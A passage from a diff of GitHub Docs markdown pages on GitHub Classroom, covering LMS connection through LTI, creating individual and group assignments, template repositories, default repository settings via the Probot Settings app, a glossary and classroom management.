belongs to the organization that you use for {% data variables.product.prodname_classroom %}. Assignment repositories can be empty, or you can use a template repository. For more information, see "[Create an assignment from a template repository](/education/manage-coursework-with-github-classroom/create-an-assignment-from-a-template-repository)." {% data reusables.classroom.you-may-want-to-predefine-repository-settings %} With the Probot Settings app, you can create a file named _.github/settings.yml_ in a repository that contains a list of settings for the repository, and then install a {% data variables.product.prodname_github_app %} for your organization that automatically applies the settings to the repository. You can include _.github/settings.yml_ in a template repository that you use for an assignment in {% data variables.product.prodname_classroom %}. When an individual or team accepts the assignment, {% data variables.product.prodname_classroom %} creates the assignment repository, and the Settings app automatically applies the settings from _.github/settings.yml_. Probot is a a project, framework, and collection of free apps to automate {% data variables.product.product_name %}. A Probot app can listen to repository events, like the creation of new commits, comments, and issues, and automatically respond to the event. For more information, see the [Probot website](https://probot.github.io) and the [Settings app website](https://probot.github.io/apps/settings/). For more information about {% data variables.product.prodname_github_apps %}, see "[About apps](/developers/apps/about-apps)." ### Adding the Settings app to your organization After you install the Probot Settings app for your organization, the app will apply the settings that you define in _.github/settings.yml_ for any repository in your organization, including new assignment repositories that {% data variables.product.prodname_classroom %} creates. 1. Navigate to the [Settings app page](https://github.com/apps/settings). 1. Click **Install**, then click the organization that you use for {% data variables.product.prodname_classroom %}. Provide the app full access to all repositories owned by the organization.  ### Configuring default settings for an assignment repository 1. Create a template repository that contains a _.github/settings.yml_ file. For a complete list of settings, see the [README](https://github.com/probot/settings#github-settings) for the `probot/settings` repository. For more information about using a template repository for starter code in {% data variables.product.prodname_classroom %}, see "[Create an assignment from a template repository](/education/manage-coursework-with-github-classroom/create-an-assignment-from-a-template-repository)." {% warning %} **Warning:** Do not define `collaborators` in the _.github/settings.yml_ file for your template repository. {% data variables.product.prodname_classroom %} automatically grants teachers and teaching assistants access to assignment repositories. {% endwarning %} 1. Create an assignment using the template repository containing _.github/settings.yml_ as the starter code. {% data reusables.classroom.for-more-information-about-assignment-creation %} The Probot Settings app for your organization will now apply the settings you define in _.github/settings.yml_ within the template repository to every assignment repository that {% data reusables.classroom.you-may-want-to-predefine-repository-settings %} creates for a student or team. ### Further reading - [Probot apps](https://probot.github.io/apps/) - [Probot documentation](https://probot.github.io/docs/) 142 ...th-github-classroom/connect-a-learning-management-system-to-github-classroom.md @@ -0,0 +1,142 @@ --- title: Connect a learning management system to GitHub Classroom intro: You can configure an LTI-compliant learning management system (LMS) to connect to {% data variables.product.prodname_classroom %} so that you can import a roster for your classroom. versions: free-pro-team: '*' redirect_from: - /education/manage-coursework-with-github-classroom/configuring-a-learning-management-system-for-github-classroom - /education/manage-coursework-with-github-classroom/connect-to-lms - /education/manage-coursework-with-github-classroom/generate-lms-credentials - /education/manage-coursework-with-github-classroom/setup-canvas - /education/manage-coursework-with-github-classroom/setup-generic-lms - /education/manage-coursework-with-github-classroom/setup-moodle --- ### About configuration of your LMS You can connect a learning management system (LMS) to {% data variables.product.prodname_classroom %}, and {% data variables.product.prodname_classroom %} can import a roster of student identifiers from the LMS. To connect your LMS to {% data variables.product.prodname_classroom %}, you must enter configuration credentials for {% data variables.product.prodname_classroom %} in your LMS. ### Prerequisites To configure an LMS to connect to {% data variables.product.prodname_classroom %}, you must first create a classroom. For more information, see "[Manage classrooms](/education/manage-coursework-with-github-classroom/manage-classrooms#creating-a-classroom)." ### Supported LMSes {% data variables.product.prodname_classroom %} supports import of roster data from LMSes that implement Learning Tools Interoperability (LTI) standards. - LTI version 1.0 and/or 1.1 - LTI Names and Roles Provisioning 1.X Using LTI helps keep your information safe and secure. LTI is an industry-standard protocol and GitHub Classroom's use of LTI is certified by the Instructional Management System (IMS) Global Learning Consortium. For more information, see [Learning Tools Interoperability](https://www.imsglobal.org/activity/learning-tools-interoperability) and [About IMS Global Learning Consortium](http://www.imsglobal.org/aboutims.html) on the IMS Global Learning Consortium website. {% data variables.product.company_short %} has tested import of roster data from the following LMSes into {% data variables.product.prodname_classroom %}. - Canvas - Google Classroom - Moodle - Sakai Currently, {% data variables.product.prodname_classroom %} doesn't support import of roster data from Blackboard or Brightspace ### Generating configuration credentials for your classroom {% data reusables.classroom.sign-into-github-classroom %} {% data reusables.classroom.click-classroom-in-list %} {% data reusables.classroom.click-students %} 1. If your classroom already has a roster, you can either update the roster or delete the roster and create a new roster. - For more information about deleting and creating a roster, see "[Deleting a roster for a classroom](/education/manage-coursework-with-github-classroom/manage-classrooms#deleting-a-roster-for-a-classroom)" and "[Creating a roster for your classroom](/education/manage-coursework-with-github-classroom/manage-classrooms#creating-a-roster-for-your-classroom)." - For more information about updating a roster, see "[Adding students to the roster for your classroom](/education/manage-coursework-with-github-classroom/manage-classrooms#adding-students-to-the-roster-for-your-classroom)." 1. In the list of LMSes, click your LMS. If your LMS is not supported, click **Other LMS**.  1. Read about connecting your LMS, then click **Connect to _LMS_**. 1. Copy the "Consumer Key", "Shared Secret", and "Launch URL" for the connection to the classroom.  ### Configuring a generic LMS You must configure the privacy settings for your LMS to allow external tools to receive roster information. 1. Navigate to your LMS. 1. Configure an external tool. 1. Provide the configuration credentials you generated in {% data variables.product.prodname_classroom %}. - Consumer key - Shared secret - Launch URL (sometimes called "tool URL" or similar) ### Configuring Canvas You can configure {% data variables.product.prodname_classroom %} as an external app for Canvas to import roster data into your classroom. For more information about Canvas, see the [Canvas website](https://www.instructure.com/canvas/). 1. Sign into [Canvas](https://www.instructure.com/canvas/#login). 1. Select the Canvas course to integrate with {% data variables.product.prodname_classroom %}. 1. In the left sidebar, click **Settings**. 1. Click the **Apps** tab. 1. Click **View app configurations**. 1. Click **+App**. 1. Select the **Configuration Type** drop-down menu, and click **By URL**. 1. Paste the configuration credentials from {% data variables.product.prodname_classroom %}. For more information, see "[Generating configuration credentials for your classroom](#generating-configuration-credentials-for-your-classroom)." | Field in Canvas app configuration | Value or setting | | :- | :- | | **Consumer Key** | Consumer key from {% data variables.product.prodname_classroom %} | | **Shared Secret** | Shared secret from {% data variables.product.prodname_classroom %} | | **Allow this tool to access the IMS Names and Role Provisioning Service** | Enabled | | **Configuration URL** | Launch URL from {% data variables.product.prodname_classroom %} | {% note %} **Note**: If you don't see a checkbox in Canvas labeled "Allow this tool to access the IMS Names and Role Provisioning Service", then your Canvas administrator must contact Canvas support to enable membership service configuration for your Canvas account. Without enabling this feature, you won't be able to sync the roster from Canvas. For more information, see [How do I contact Canvas Support?](https://community.canvaslms.com/t5/Canvas-Basics-Guide/How-do-I-contact-Canvas-Support/ta-p/389767) on the Canvas website. {% endnote %} 1. Click **Submit**. 1. In the left sidebar, click **Home**. 1. To prompt Canvas to send a confirmation email, in the left sidebar, click **GitHub Classroom**. Follow the instructions in the email to finish linking {% data variables.product.prodname_classroom %}. ### Configuring Moodle You can configure {% data variables.product.prodname_classroom %} as an activity for Moodle to import roster data into your classroom. For more information about Moodle, see the [Moodle website](https://moodle.org). You must be using Moodle version 3.0 or greater. 1. Sign into [Moodle](https://moodle.org/login/index.php). 1. Select the Moodle course to integrate with {% data variables.product.prodname_classroom %}. 1. Click **Turn editing on**. 1. Wherever you'd like {% data variables.product.prodname_classroom %} to be available in Moodle, click **Add an activity or resource**. 1. Choose **External tool** and click **Add**. 1. In the "Activity name" field, type "GitHub Classroom". 1. In the **Preconfigured tool** field, to the right of the drop-down menu, click **+**. 1. Under "External tool configuration", paste the configuration credentials from {% data variables.product.prodname_classroom %}. For more information, see "[Generating configuration credentials for your classroom](#generating-configuration-credentials-for-your-classroom)." | Field in Moodle app configuration | Value or setting | | :- | :- | | **Tool name** | {% data variables.product.prodname_classroom %} - _YOUR CLASSROOM NAME_<br/><br/>**Note**: You can use any name, but we suggest this value for clarity. | | **Tool URL** | Launch URL from {% data variables.product.prodname_classroom %} | | **LTI version** | LTI 1.0/1.1 | | **Default launch container** | New window | | **Consumer key** | Consumer key from {% data variables.product.prodname_classroom %} | | **Shared secret** | Shared secret from {% data variables.product.prodname_classroom %} | 1. Scroll to and click **Services**. 1. To the right of "IMS LTI Names and Role Provisioning", select the drop-down menu and click **Use this service to retrieve members' information as per privacy settings**. 1. Scroll to and click **Privacy**. 1. To the right of **Share launcher's name with tool** and **Share launcher's email with tool**, select the drop-down menus to click **Always**. 1. At the bottom of the page, click **Save changes**. 1. In the **Preconfigure tool** menu, click **GitHub Classroom - _YOUR CLASSROOM NAME_**. 1. Under "Common module settings", to the right of "Availability", select the drop-down menu and click **Hide from students**. 1. At the bottom of the page, click **Save and return to course**. 1. Navigate to anywhere you chose to display {% data variables.product.prodname_classroom %}, and click the {% data variables.product.prodname_classroom %} activity. ### Importing a roster from your LMS For more information about importing the roster from your LMS into {% data variables.product.prodname_classroom %}, see "[Manage classrooms](/education/manage-coursework-with-github-classroom/manage-classrooms#creating-a-roster-for-your-classroom)." ### Disconnecting your LMS {% data reusables.classroom.sign-into-github-classroom %} {% data reusables.classroom.click-classroom-in-list %} {% data reusables.classroom.click-settings %} 1. Under "Connect to a learning management system (LMS)", click **Connection Settings**.  1. Under "Delete Connection to your learning management system", click **Disconnect from your learning management system**.  145 .../education/manage-coursework-with-github-classroom/create-a-group-assignment.md @@ -0,0 +1,145 @@ --- title: Create a group assignment intro: 'You can create a collaborative assignment for teams of students who participate in your course.' versions: free-pro-team: '*' redirect_from: - /education/manage-coursework-with-github-classroom/create-group-assignments --- ### About group assignments {% data reusables.classroom.assignments-group-definition %} Students can work together on a group assignment in a shared repository, like a team of professional developers. When a student accepts a group assignment, the student can create a new team or join an existing team. {% data variables.product.prodname_classroom %} saves the teams for an assignment as a set. You can name the set of teams for a specific assignment when you create the assignment, and you can reuse that set of teams for a later assignment. {% data reusables.classroom.classroom-creates-group-repositories %} {% data reusables.classroom.about-assignments %} You can decide how many teams one assignment can have, and how many members each team can have. Each team that a student creates for an assignment is a team within your organization on {% data variables.product.product_name %}. The visibility of the team is secret. Teams that you create on {% data variables.product.product_name %} will not appear in {% data variables.product.prodname_classroom %}. For more information, see "[About teams](/github/setting-up-and-managing-organizations-and-teams/about-teams)." For a video demonstration of the creation of a group assignment, see "[Basics of setting up {% data variables.product.prodname_classroom %}](/education/manage-coursework-with-github-classroom/basics-of-setting-up-github-classroom)." ### Prerequisites {% data reusables.classroom.assignments-classroom-prerequisite %} ### Creating an assignment {% data reusables.classroom.assignments-guide-create-the-assignment %} ### Setting up the basics for an assignment Name your assignment, decide whether to assign a deadline, define teams, and choose the visibility of assignment repositories. - [Naming an assignment](#naming-an-assignment) - [Assigning a deadline for an assignment](#assigning-a-deadline-for-an-assignment) - [Choosing an assignment type](#choosing-an-assignment-type) - [Defining teams for an assignment](#defining-teams-for-an-assignment) - [Choosing a visibility for assignment repositories](#choosing-a-visibility-for-assignment-repositories) #### Naming an assignment For a group assignment, {% data variables.product.prodname_classroom %} names repositories by the repository prefix and the name of the team. By default, the repository prefix is the assignment title. For example, if you name an assignment "assignment-1" and the team's name on {% data variables.product.product_name %} is "student-team", the name of the assignment repository for members of the team will be `assignment-1-student-team`. {% data reusables.classroom.assignments-type-a-title %} #### Assigning a deadline for an assignment {% data reusables.classroom.assignments-guide-assign-a-deadline %} #### Choosing an assignment type Under "Individual or group assignment", select the drop-down menu, then click **Group assignment**. You can't change the assignment type after you create the assignment. If you'd rather create a individual assignment, see "[Create an individual assignment](/education/manage-coursework-with-github-classroom/create-an-individual-assignment)." #### Defining teams for an assignment If you've already created a group assignment for the classroom, you can reuse a set of teams for the new assignment. To create a new set with the teams that your students create for the assignment, type the name for the set. Optionally, type the maximum number of team members and total teams. {% tip %} **Tips**: - We recommend including details about the set of teams in the name for the set. For example, if you want to use the set of teams for one assignment, name the set after the assignment. If you want to reuse the set throughout a semester or course, name the set after the semester or course. - If you'd like to assign students to a specific team, give your students a name for the team and provide a list of members. {% endtip %}  #### Choosing a visibility for assignment repositories {% data reusables.classroom.assignments-guide-choose-visibility %} {% data reusables.classroom.assignments-guide-click-continue-after-basics %} ### Adding starter code and configuring a development environment {% data reusables.classroom.assignments-guide-intro-for-environment %} - [Choosing a template repository](#choosing-a-template-repository) - [Choosing an online integrated development environment (IDE)](#choosing-an-online-integrated-development-environment-ide) #### Choosing a template repository By default, a new assignment will create an empty repository for each team that a student creates. {% data reusables.classroom.you-can-choose-a-template-repository %} For more information about template repositories, see "[Creating a template repository](/github/creating-cloning-and-archiving-repositories/creating-a-template-repository)." {% data reusables.classroom.assignments-guide-choose-template-repository %} #### Choosing an online integrated development environment (IDE) {% data reusables.classroom.about-online-ides %} For more information, see "[Integrate {% data variables.product.prodname_classroom %} with an IDE](/education/manage-coursework-with-github-classroom/integrate-github-classroom-with-an-ide)." {% data reusables.classroom.assignments-guide-choose-an-online-ide %} {% data reusables.classroom.assignments-guide-click-continue-after-starter-code-and-feedback %} ### Providing feedback Optionally, you can automatically grade assignments and create a space for discussing each submission with the team. - [Testing assignments automatically](#testing-assignments-automatically) - [Preventing changes to important files](#preventing-changes-to-important-files) - [Creating a pull request for feedback](#creating-a-pull-request-for-feedback) #### Testing assignments automatically {% data reusables.classroom.assignments-guide-using-autograding %} #### Preventing changes to important files {% data reusables.classroom.assignments-guide-prevent-changes %} #### Creating a pull request for feedback {% data reusables.classroom.you-can-create-a-pull-request-for-feedback %} {% data reusables.classroom.assignments-guide-create-review-pull-request %} {% data reusables.classroom.assignments-guide-click-create-assignment-button %} ### Inviting students to an assignment {% data reusables.classroom.assignments-guide-invite-students-to-assignment %} You can see the teams that are working on or have submitted an assignment in the **Teams** tab for the assignment. {% data reusables.classroom.assignments-to-prevent-submission %} <div class="procedural-image-wrapper"> <img alt="Group assignment" class="procedural-image-wrapper" src="/assets/images/help/classroom/assignment-group-hero.png"> </div> ### Next steps - After you create the assignment and your students form teams, team members can start work on the assignment using Git and {% data variables.product.product_name %}'s features. Students can clone the repository, push commits, manage branches, create and review pull requests, address merge conflicts, and discuss changes with issues. Both you and the team can review the commit history for the repository. For more information, see "[Getting started with {% data variables.product.prodname_dotcom %}](/github/getting-started-with-github)," "[Creating, cloning, and archiving repositories](/github/creating-cloning-and-archiving-repositories)," "[Using Git](/github/using-git)," and "[Collaborating with issues and pull requests](/github/collaborating-with-issues-and-pull-requests)," and the free course on [managing merge conflicts](https://lab.github.com/githubtraining/managing-merge-conflicts) from {% data variables.product.prodname_learning %}. - When a team finishes an assignment, you can review the files in the repository, or you can review the history and visualizations for the repository to better understand how the team collaborated. For more information, see "[Visualizing repository data with graphs](/github/visualizing-repository-data-with-graphs)." - You can provide feedback for an assignment by commenting on individual commits or lines in a pull request. For more information, see "[Commenting on a pull request](/github/collaborating-with-issues-and-pull-requests/commenting-on-a-pull-request)" and "[Opening an issue from code](/github/managing-your-work-on-github/opening-an-issue-from-code)." For more information about creating saved replies to provide feedback for common errors, see "[About saved replies](/github/writing-on-github/about-saved-replies)." ### Further reading - "[Use {% data variables.product.prodname_dotcom %} in your classroom and research](/education/teach-and-learn-with-github-education/use-github-in-your-classroom-and-research)" - "[Connect a learning management system to {% data variables.product.prodname_classroom %}](/education/manage-coursework-with-github-classroom/connect-a-learning-management-system-to-github-classroom)" - [Using Existing Teams in Group Assignments?](https://education.github.community/t/using-existing-teams-in-group-assignments/6999) in the {% data variables.product.prodname_education %} Community 19 ...sework-with-github-classroom/create-an-assignment-from-a-template-repository.md @@ -0,0 +1,19 @@ --- title: Create an assignment from a template repository intro: You can create an assignment from a template repository to provide starter code, documentation, and other resources to your students. versions: free-pro-team: '*' redirect_from: - /education/manage-coursework-with-github-classroom/using-template-repos-for-assignments --- You can use a template repository on {% data variables.product.product_name %} as starter code for an assignment on {% data variables.product.prodname_classroom %}. Your template repository can contain boilerplate code, documentation, and other resources for your students. For more information, see "[Creating a template repository](/github/creating-cloning-and-archiving-repositories/creating-a-template-repository)." To use the template repository for your assignment, the template repository must be owned by your organization, or the visibility of the template repository must be public. {% data reusables.classroom.you-may-want-to-predefine-repository-settings %} For more information, see "[Configure default settings for assignment repositories](/education/manage-coursework-with-github-classroom/configure-default-settings-for-assignment-repositories)." ### Further reading - "[Create an individual assignment](/education/manage-coursework-with-github-classroom/create-an-individual-assignment)" - "[Create a group assignment](/education/manage-coursework-with-github-classroom/create-a-group-assignment)" 124 ...tion/manage-coursework-with-github-classroom/create-an-individual-assignment.md @@ -0,0 +1,124 @@ --- title: Create an individual assignment intro: You can create an assignment for students in your course to complete individually. versions: free-pro-team: '*' redirect_from: - /education/manage-coursework-with-github-classroom/creating-an-individual-assignment - /education/manage-coursework-with-github-classroom/create-an-individual-assignment --- ### About individual assignments {% data reusables.classroom.assignments-individual-definition %} {% data reusables.classroom.classroom-creates-individual-repositories %} {% data reusables.classroom.about-assignments %} For a video demonstration of the creation of an individual assignment, see "[Basics of setting up {% data variables.product.prodname_classroom %}](/education/manage-coursework-with-github-classroom/basics-of-setting-up-github-classroom)." ### Prerequisites {% data reusables.classroom.assignments-classroom-prerequisite %} ### Creating an assignment {% data reusables.classroom.assignments-guide-create-the-assignment %} ### Setting up the basics for an assignment Name your assignment, decide whether to assign a deadline, and choose the visibility of assignment repositories. - [Naming an assignment](#naming-an-assignment) - [Assigning a deadline for an assignment](#assigning-a-deadline-for-an-assignment) - [Choosing an assignment type](#choosing-an-assignment-type) - [Choosing a visibility for assignment repositories](#choosing-a-visibility-for-assignment-repositories) #### Naming an assignment For an individual assignment, {% data variables.product.prodname_classroom %} names repositories by the repository prefix and the student's {% data variables.product.product_name %} username. By default, the repository prefix is the assignment title. For example, if you name an assignment "assignment-1" and the student's username on {% data variables.product.product_name %} is @octocat, the name of the assignment repository for @octocat will be `assignment-1-octocat`. {% data reusables.classroom.assignments-type-a-title %} #### Assigning a deadline for an assignment {% data reusables.classroom.assignments-guide-assign-a-deadline %} #### Choosing an assignment type Under "Individual or group assignment", select the drop-down menu, and click **Individual assignment**. You can't change the assignment type after you create the assignment. If you'd rather create a group assignment, see "[Create a group assignment](/education/manage-coursework-with-github-classroom/create-a-group-assignment)." #### Choosing a visibility for assignment repositories {% data reusables.classroom.assignments-guide-choose-visibility %} {% data reusables.classroom.assignments-guide-click-continue-after-basics %} ### Adding starter code and configuring a development environment {% data reusables.classroom.assignments-guide-intro-for-environment %} - [Choosing a template repository](#choosing-a-template-repository) - [Choosing an online integrated development environment (IDE)](#choosing-an-online-integrated-development-environment-ide) #### Choosing a template repository By default, a new assignment will create an empty repository for each student on the roster for the classroom. {% data reusables.classroom.you-can-choose-a-template-repository %} For more information about template repositories, see "[Creating a template repository](/github/creating-cloning-and-archiving-repositories/creating-a-template-repository)." {% data reusables.classroom.assignments-guide-choose-template-repository %} {% data reusables.classroom.assignments-guide-click-continue-after-starter-code-and-feedback %} #### Choosing an online integrated development environment (IDE) {% data reusables.classroom.about-online-ides %} For more information, see "[Integrate {% data variables.product.prodname_classroom %} with an IDE](/education/manage-coursework-with-github-classroom/integrate-github-classroom-with-an-ide)." {% data reusables.classroom.assignments-guide-choose-an-online-ide %} ### Providing feedback for an assignment Optionally, you can automatically grade assignments and create a space for discussing each submission with the student. - [Testing assignments automatically](#testing-assignments-automatically) - [Preventing changes to important files](#preventing-changes-to-important-files) - [Creating a pull request for feedback](#creating-a-pull-request-for-feedback) #### Testing assignments automatically {% data reusables.classroom.assignments-guide-using-autograding %} #### Preventing changes to important files {% data reusables.classroom.assignments-guide-prevent-changes %} #### Creating a pull request for feedback {% data reusables.classroom.you-can-create-a-pull-request-for-feedback %} {% data reusables.classroom.assignments-guide-create-review-pull-request %} {% data reusables.classroom.assignments-guide-click-create-assignment-button %} ### Inviting students to an assignment {% data reusables.classroom.assignments-guide-invite-students-to-assignment %} You can see whether a student has joined the classroom and accepted or submitted an assignment in the **All students** tab for the assignment. {% data reusables.classroom.assignments-to-prevent-submission %} <div class="procedural-image-wrapper"> <img alt="Individual assignment" class="procedural-image-wrapper" src="/assets/images/help/classroom/assignment-individual-hero.png"> </div> ### Next steps - Once you create the assignment, students can start work on the assignment using Git and {% data variables.product.product_name %}'s features. Students can clone the repository, push commits, manage branches, create and review pull requests, address merge conflicts, and discuss changes with issues. Both you and student can review the commit history for the repository. For more information, see "[Getting started with {% data variables.product.prodname_dotcom %}](/github/getting-started-with-github)," "[Creating, cloning, and archiving repositories](/github/creating-cloning-and-archiving-repositories)," "[Using Git](/github/using-git)," and "[Collaborating with issues and pull requests](/github/collaborating-with-issues-and-pull-requests)." - When a student finishes an assignment, you can review the files in the repository, or you can review the history and visualizations for the repository to better understand the student's work. For more information, see "[Visualizing repository data with graphs](/github/visualizing-repository-data-with-graphs)." - You can provide feedback for an assignment by commenting on individual commits or lines in a pull request. For more information, see "[Commenting on a pull request](/github/collaborating-with-issues-and-pull-requests/commenting-on-a-pull-request)" and "[Opening an issue from code](/github/managing-your-work-on-github/opening-an-issue-from-code)." For more information about creating saved replies to provide feedback for common errors, see "[About saved replies](/github/writing-on-github/about-saved-replies)." ### Further reading - "[Use {% data variables.product.prodname_dotcom %} in your classroom and research](/education/teach-and-learn-with-github-education/use-github-in-your-classroom-and-research)" - "[Connect a learning management system to {% data variables.product.prodname_classroom %}](/education/manage-coursework-with-github-classroom/connect-a-learning-management-system-to-github-classroom)" 9 ...on/manage-coursework-with-github-classroom/get-started-with-github-classroom.md @@ -0,0 +1,9 @@ --- title: Get started with GitHub Classroom shortTitle: Get started intro: Learn how to configure and use {% data variables.product.prodname_classroom %} to administer your course. mapTopic: true versions: free-pro-team: '*' --- 52 content/education/manage-coursework-with-github-classroom/glossary.md @@ -0,0 +1,52 @@ --- title: Glossary intro: You can review explanations of terminology for {% data variables.product.prodname_classroom %}. versions: free-pro-team: '*' --- ### assignment An assignment is coursework in {% data variables.product.prodname_classroom %}. A teacher can assign an assignment to an individual student or a group of students. Teachers can import starter code for the assignment, assign students, and create a deadline for each assignment. For more information, see the definitions for "[individual assignment](#individual-assignment)" and "[group assignment](#group-assignment)." --- ### classroom A classroom is the basic unit of {% data variables.product.prodname_classroom %}. Teachers can use a classroom to organize and manage students, teaching assistants, and assignments for a single course. A classroom belongs to an organization on {% data variables.product.prodname_dotcom_the_website %}. To administer a classroom, you must be an organization owner for the organization on {% data variables.product.prodname_dotcom %}. For more information, see "[Manage classrooms](/education/manage-coursework-with-github-classroom/manage-classrooms)." --- ### {% data variables.product.prodname_classroom %} {% data variables.product.prodname_classroom %} is a web application for educators that provides course administration tools integrated with {% data variables.product.prodname_dotcom %}. For more information, see the [{% data variables.product.prodname_classroom %}](https://classroom.github.com/) website. --- ### group assignment {% data reusables.classroom.assignments-group-definition %} For more information, see "[Create a group assignment](/education/manage-coursework-with-github-classroom/create-a-group-assignment)." --- ### identifier An identifier in {% data variables.product.prodname_classroom %} is a unique ID for a student participating in a course. For example, an identifier can be a student name, alphanumeric ID, or email address. --- ### individual assignment {% data reusables.classroom.assignments-individual-definition %} For more information, see "[Create an individual assignment](/education/manage-coursework-with-github-classroom/create-an-individual-assignment)." --- ### roster A roster allows a teacher to manage students and assignment submissions in a classroom on {% data variables.product.prodname_classroom %}. Teachers can create a roster by entering a list of student identifiers, or by connecting {% data variables.product.prodname_classroom %} to a learning management system (LMS). For more information about identifiers, see the definition of "[identifier](#identifier)." For more information about connecting {% data variables.product.prodname_classroom %} to an LMS, see "[Connect a learning management system to {% data variables.product.prodname_classroom %}](/education/manage-coursework-with-github-classroom/connect-a-learning-management-system-to-github-classroom)." --- ### Further reading - "[{% data variables.product.prodname_dotcom %} glossary](/github/getting-started-with-github/github-glossary)" 32 content/education/manage-coursework-with-github-classroom/index.md @@ -0,0 +1,32 @@ --- title: Manage coursework with GitHub Classroom shortTitle: '{% data variables.product.prodname_classroom %}' intro: With {% data variables.product.prodname_classroom %}, you can use {% data variables.product.product_name %} to administer or participate in a course about software development. versions: free-pro-team: '*' --- ### Table of Contents {% topic_link_in_list /get-started-with-github-classroom %} {% link_in_list /basics-of-setting-up-github-classroom %} {% link_in_list /glossary %} {% topic_link_in_list /teach-with-github-classroom %} {% link_in_list /manage-classrooms %} {% link_in_list /create-an-individual-assignment %} {% link_in_list /create-a-group-assignment %} {% link_in_list /create-an-assignment-from-a-template-repository %} {% link_in_list /leave-feedback-with-pull-requests %} {% link_in_list /use-autograding %} {% link_in_list /configure-default-settings-for-assignment-repositories %} {% link_in_list /connect-a-learning-management-system-to-github-classroom %} {% topic_link_in_list /integrate-github-classroom-with-an-ide %} {% link_in_list /integrate-github-classroom-with-an-online-ide %} {% link_in_list /about-using-makecode-arcade-with-github-classroom %} {% link_in_list /about-using-replit-with-github-classroom %} {% link_in_list /run-student-code-in-an-online-ide %} {% topic_link_in_list /learn-with-github-classroom %} {% link_in_list /view-autograding-results %} 8 ...nage-coursework-with-github-classroom/integrate-github-classroom-with-an-ide.md @@ -0,0 +1,8 @@ --- title: Integrate GitHub Classroom with an IDE shortTitle: Integrate with an IDE intro: You can help your students write, test, and debug code by preconfiguring a development environment for assignment repositories on {% data variables.product.prodname_classroom %}. mapTopic: true versions: free-pro-team: '*' --- 42 ...ursework-with-github-classroom/integrate-github-classroom-with-an-online-ide.md @@ -0,0 +1,42 @@ --- title: Integrate GitHub Classroom with an online IDE shortTitle: Integrate with an online IDE intro: You can preconfigure a supported online integrated development environment (IDE) for assignments you create in {% data variables.product.prodname_classroom %}. versions: free-pro-team: '*' redirect_from: - /education/manage-coursework-with-github-classroom/online-ide-integrations --- ### About integration with an online IDE {% data reusables.classroom.about-online-ides %} After a student accepts an assignment with an online IDE, the README file in the student's assignment repository will contain a button to open the assignment in the IDE. The student can begin working immediately, and no additional configuration is necessary.  ### Supported online IDEs {% data variables.product.prodname_classroom %} supports the following online IDEs. You can learn more about the student experience for each IDE. | IDE | More information | | :- | :- | | Microsoft MakeCode Arcade | "[About using MakeCode Arcade with {% data variables.product.prodname_classroom %}](/education/manage-coursework-with-github-classroom/about-using-makecode-arcade-with-github-classroom)" | | Repl.it | "[About using Repl.it with GitHub Classroom](/education/manage-coursework-with-github-classroom/about-using-replit-with-github-classroom)" | ### Configuring an online IDE for an assignment You can choose the online IDE you'd like to use for an assignment when you create an assignment. To learn how to create a new assignment that uses an online IDE, see "[Create an individual assignment](/education/manage-coursework-with-github-classroom/create-an-individual-assignment)" or "[Create a group assignment](/education/manage-coursework-with-github-classroom/create-a-group-assignment)." ### Authorizing the OAuth app for an online IDE The first time you configure an assignment with an online IDE, you must authorize the OAuth app for the online IDE for your organization.  For all repositories, grant the app **read** access to metadata, administration, and code, and **write** access to administration and code. For more information, see "[Authorizing OAuth Apps](/github/authenticating-to-github/authorizing-oauth-apps)." ### Further reading - "[About READMEs](/github/creating-cloning-and-archiving-repositories/about-readmes)" 7 ...ducation/manage-coursework-with-github-classroom/learn-with-github-classroom.md @@ -0,0 +1,7 @@ --- title: Learn with GitHub Classroom intro: You can participate in coursework in {% data variables.product.prodname_classroom %} and see results from your teacher. mapTopic: true versions: free-pro-team: '*' --- 33 ...on/manage-coursework-with-github-classroom/leave-feedback-with-pull-requests.md @@ -0,0 +1,33 @@ --- title: Leave feedback with pull requests intro: You can leave feedback for your students in a special pull request within the repository for each assignment. permissions: People with read permissions to a repository can leave feedback in a pull request for the repository. versions: free-pro-team: '*' redirect_from: - /education/manage-coursework-with-github-classroom/leaving-feedback-in-github --- ### About feedback pull requests for assignments {% data reusables.classroom.you-can-create-a-pull-request-for-feedback %} When you enable the pull request for feedback for an assignment, {% data variables.product.prodname_classroom %} will create a special pull request titled **Feedback** in the assignment repository for each student or team. The pull request automatically shows every commit that a student pushed to the assignment repository's default branch. ### Prerequisites To create and access the feedback pull request, you must enable the feedback pull request when you create the assignment. {% data reusables.classroom.for-more-information-about-assignment-creation %} ### Leaving feedback in a pull request for an assignment {% data reusables.classroom.sign-into-github-classroom %} 1. In the list of classrooms, click the classroom with the assignment you want to review.  {% data reusables.classroom.click-assignment-in-list %} 1. To the right of the submission, click **Review**.  1. Review the pull request. For more information, see "[Commenting on a pull request](/github/collaborating-with-issues-and-pull-requests/commenting-on-a-pull-request)." ### Further reading - "[Integrate {% data variables.product.prodname_classroom %} with an IDE](http://localhost:4000/en/free-pro-team@latest/education/manage-coursework-with-github-classroom/integrate-github-classroom-with-an-ide)" 121 content/education/manage-coursework-with-github-classroom/manage-classrooms.md @@ -0,0 +1,121 @@ --- title: Manage classrooms intro: You can create and manage a classroom for each course that you teach using {% data variables.product.prodname_classroom %}. permissions: Organization owners can manage a classroom for an organization. versions: free-pro-team: '*' redirect_from: - /education/manage-coursework-with-github-classroom/archive-a-classroom --- ### About classrooms {% data reusables.classroom.about-classrooms %}  ### About management of classrooms {% data variables.product.prodname_classroom %} uses organization accounts on {% data variables.product.product_name %} to manage permissions, administration, and security for each classroom that you create. Each organization can have multiple classrooms. After you create a classroom, {% data variables.product.prodname_classroom %} will prompt you to invite teaching assistants (TAs) and admins to the classroom. Each classroom can have one or more admins. Admins can be teachers, TAs, or any other course administrator who you'd like to have control over your classrooms on {% data variables.product.prodname_classroom %}. Invite TAs and admins to your classroom by inviting the user accounts on {% data variables.product.product_name %} to your organization as organization owners and sharing the URL for your classrom. Organization owners can administer any classroom for the organization. For more information, see "[Permission levels for an organization](/github/setting-up-and-managing-organizations-and-teams/permission-levels-for-an-organization)" and "[Inviting users to join your organization](/github/setting-up-and-managing-organizations-and-teams/inviting-users-to-join-your-organization)." When you're done using a classroom, you can archive the classroom and refer to the classroom, roster, and assignments later, or you can delete the classroom if you no longer need the classroom. ### About classroom rosters Each classroom has a roster. A roster is a list of identifiers for the students who participate in your course. When you first share the URL for an assignment with a student, the student must sign into {% data variables.product.product_name %} with a user account to link the user account to an identifier for the classroom. After the student links a user account, you can see the associated user account in the roster. You can also see when the student accepts or submits an assignment.  ### Prerequisites You must have an organization account on {% data variables.product.product_name %} to manage classrooms on {% data variables.product.prodname_classroom %}. For more information, see "[Types of {% 